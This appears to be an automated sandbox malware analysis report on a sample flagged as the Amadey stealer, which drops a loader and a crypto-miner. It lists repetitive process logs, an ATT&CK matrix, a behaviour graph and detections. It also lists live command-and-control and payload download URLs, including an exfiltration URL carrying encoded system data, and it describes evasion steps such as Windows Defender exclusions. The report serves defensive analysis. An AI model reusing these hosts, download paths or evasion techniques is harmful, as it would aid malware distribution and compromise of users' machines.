                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C3CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_00C3CB1A
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C265B0 LookupAccountNameA,6_2_00C265B0
                        Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Amadeys stealer DLL
                        Source: Yara matchFile source: 2.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.960000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.2302324520.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1763005271.0000000000961000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1749088265.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1722139585.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1789363065.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1789584314.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting                        		Valid Accounts11
                        Windows Management Instrumentation                        		1
                        Scripting                        		1
                        Exploitation for Privilege Escalation                        		11
                        Disable or Modify Tools                        		OS Credential Dumping1
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		12
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts12
                        Command and Scripting Interpreter                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory1
                        Account Discovery                        		Remote Desktop ProtocolData from Removable Media21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts11
                        Scheduled Task/Job                        		1
                        Windows Service                        		1
                        Windows Service                        		31
                        Obfuscated Files or Information                        		Security Account Manager1
                        File and Directory Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCron11
                        Scheduled Task/Job                        		12
                        Process Injection                        		13
                        Software Packing                        		NTDS237
                        System Information Discovery                        		Distributed Component Object ModelInput Capture114
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                        Scheduled Task/Job                        		1
                        DLL Side-Loading                        		LSA Secrets861
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                        Masquerading                        		Cached Domain Credentials361
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items361
                        Virtualization/Sandbox Evasion                        		DCSync3
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                        Process Injection                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        System Owner/User Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520638 Sample: file.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 173 eijfrhegrtbrfcd.online 2->173 175 sanctam.net 2->175 177 github.com 2->177 207 Suricata IDS alerts for network traffic 2->207 209 Found malware configuration 2->209 211 Antivirus detection for URL or domain 2->211 213 14 other signatures 2->213 15 axplong.exe 16 2->15         started        20 file.exe 5 2->20         started        22 services64.exe 2->22         started        24 2 other processes 2->24 signatures3 process4 dnsIp5 183 185.215.113.16, 49737, 49738, 49740 WHOLESALECONNECTIONSNL Portugal 15->183 153 C:\Users\user\...\loader_5879465914.exe, PE32+ 15->153 dropped 155 C:\Users\user\...\loader_5879465914[1].exe, PE32+ 15->155 dropped 187 Hides threads from debuggers 15->187 189 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->189 191 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->191 26 loader_5879465914.exe 2 15->26         started        157 C:\Users\user\AppData\Local\...\axplong.exe, PE32 20->157 dropped 159 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 20->159 dropped 193 Detected unpacking (changes PE section rights) 20->193 195 Tries to evade debugger and weak emulator (self modifying code) 20->195 197 Tries to detect virtualization through RDTSC time measurements 20->197 199 Potentially malicious time measurement code found 20->199 31 axplong.exe 20->31         started        201 Adds a directory exclusion to Windows Defender 22->201 33 cmd.exe 22->33         started        35 cmd.exe 22->35         started        37 cmd.exe 24->37         started        39 cmd.exe 24->39         started        41 cmd.exe 24->41         started        43 26 other processes 24->43 file6 signatures7 process8 dnsIp9 179 eijfrhegrtbrfcd.online 172.67.187.100, 443, 49739, 49743 CLOUDFLARENETUS United States 26->179 171 C:\Users\user\AppData\...\Microsoft-Edge.exe, PE32+ 26->171 dropped 231 Found API chain indicative of debugger detection 26->231 45 cmd.exe 26->45         started        47 cmd.exe 1 26->47         started        54 40 other processes 26->54 233 Antivirus detection for dropped file 31->233 235 Multi AV Scanner detection for dropped file 31->235 237 Detected unpacking (changes PE section rights) 31->237 241 6 other signatures 31->241 239 Adds a directory exclusion to Windows Defender 33->239 56 5 other processes 33->56 58 2 other processes 35->58 50 conhost.exe 37->50         started        60 2 other processes 39->60 52 conhost.exe 41->52         started        62 26 other processes 43->62 file10 signatures11 process12 signatures13 64 miner2.0.exe 45->64         started        68 curl.exe 45->68         started        70 conhost.exe 45->70         started        243 Adds a directory exclusion to Windows Defender 47->243 72 cscript.exe 2 47->72         started        78 2 other processes 47->78 74 conhost.exe 50->74         started        76 conhost.exe 52->76         started        81 37 other processes 54->81 245 Loading BitLocker PowerShell Module 56->245 247 Drops executables to the windows directory (C:\Windows) and starts them 58->247 83 3 other processes 58->83 process14 dnsIp15 161 C:\Users\user\AppData\Local\...\svchost64.exe, PE32+ 64->161 dropped 203 Adds a directory exclusion to Windows Defender 64->203 85 cmd.exe 64->85         started        87 cmd.exe 64->87         started        163 C:\Users\user\AppData\Local\...\miner2.0.exe, PE32+ 68->163 dropped 205 Uses schtasks.exe or at.exe to add and modify task schedules 72->205 90 schtasks.exe 72->90         started        181 127.0.0.1 unknown unknown 78->181 92 conhost.exe 83->92         started        94 schtasks.exe 83->94         started        96 conhost.exe 83->96         started        98 choice.exe 83->98         started        file16 signatures17 process18 signatures19 100 svchost64.exe 85->100         started        104 conhost.exe 85->104         started        221 Adds a directory exclusion to Windows Defender 87->221 106 powershell.exe 87->106         started        108 powershell.exe 87->108         started        110 powershell.exe 87->110         started        114 2 other processes 87->114 112 conhost.exe 90->112         started        process20 file21 169 C:\Windows\System32\services64.exe, PE32+ 100->169 dropped 217 Drops executables to the windows directory (C:\Windows) and starts them 100->217 116 services64.exe 100->116         started        119 cmd.exe 100->119         started        121 cmd.exe 100->121         started        219 Loading BitLocker PowerShell Module 106->219 signatures22 process23 signatures24 215 Adds a directory exclusion to Windows Defender 116->215 123 cmd.exe 116->123         started        126 cmd.exe 116->126         started        128 conhost.exe 119->128         started        130 schtasks.exe 119->130         started        132 conhost.exe 121->132         started        134 choice.exe 121->134         started        process25 signatures26 229 Adds a directory exclusion to Windows Defender 123->229 136 powershell.exe 123->136         started        139 powershell.exe 123->139         started        141 powershell.exe 123->141         started        149 2 other processes 123->149 143 svchost64.exe 126->143         started        147 conhost.exe 126->147         started        process27 dnsIp28 223 Loading BitLocker PowerShell Module 136->223 185 github.com 140.82.121.3, 443, 49830, 49842 GITHUBUS United States 143->185 165 C:\Windows\System32\...\sihost64.exe, PE32+ 143->165 dropped 167 C:\Windows\System32\Microsoft\Libs\WR64.sys, PE32+ 143->167 dropped 225 Found strings related to Crypto-Mining 143->225 227 Sample is not signed and drops a device driver 143->227 151 cmd.exe 143->151         started        file29 signatures30 process31

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        file.exe50%ReversingLabsWin32.Packed.Themida
                        file.exe100%AviraTR/Crypt.TPM.Gen
                        file.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe50%ReversingLabsWin32.Trojan.Generic
                        C:\Windows\System32\Microsoft\Libs\WR64.sys7%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://185.215.113.16/Jo89Ku7d/index.php100%URL Reputationphishing

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        eijfrhegrtbrfcd.online
                        		172.67.187.100
                        		truetrue
                          		unknown
                          github.com
                          		140.82.121.3
                          		truefalse
                            		unknown
                            sanctam.net
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://eijfrhegrtbrfcd.online/download/conf1.phptrue
                                		unknown
                                https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0=false
                                  		unknown
                                  https://eijfrhegrtbrfcd.online/download/miner2.0.exefalse
                                    		unknown
                                    http://185.215.113.16/Jo89Ku7d/index.phptrue
                                    • URL Reputation: phishing
                                    		unknown
                                    https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zipfalse
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://185.215.113.16/Jo89Ku7d/index.phpncodedeaxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
                                        		unknown
                                        https://eijfrhegrtbrfcd.online/RMicrosoft-Edge.exe, 0000000E.00000002.3022066818.0000000003705000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://eijfrhegrtbrfcd.online/download/miner2.0.execk.dllcurl.exe, 00000052.00000002.2619013349.000001DFDEF54000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://github.comsvchost64.exe, 0000008B.00000002.2788969573.0000000003740000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://185.215.113.16/Waxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://eijfrhegrtbrfcd.online/download/miner2.0.exeXcurl.exe, 00000052.00000003.2618490481.000001DFDEF7B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000002.2619230837.000001DFDEF7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://185.215.113.16/inc/loader_5879465914.exe%axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://185.215.113.16/Jo89Ku7d/index.phpERaxplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmptrue
                                                      		unknown
                                                      http://185.215.113.16/Jo89Ku7d/index.phpncodedraxplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmptrue
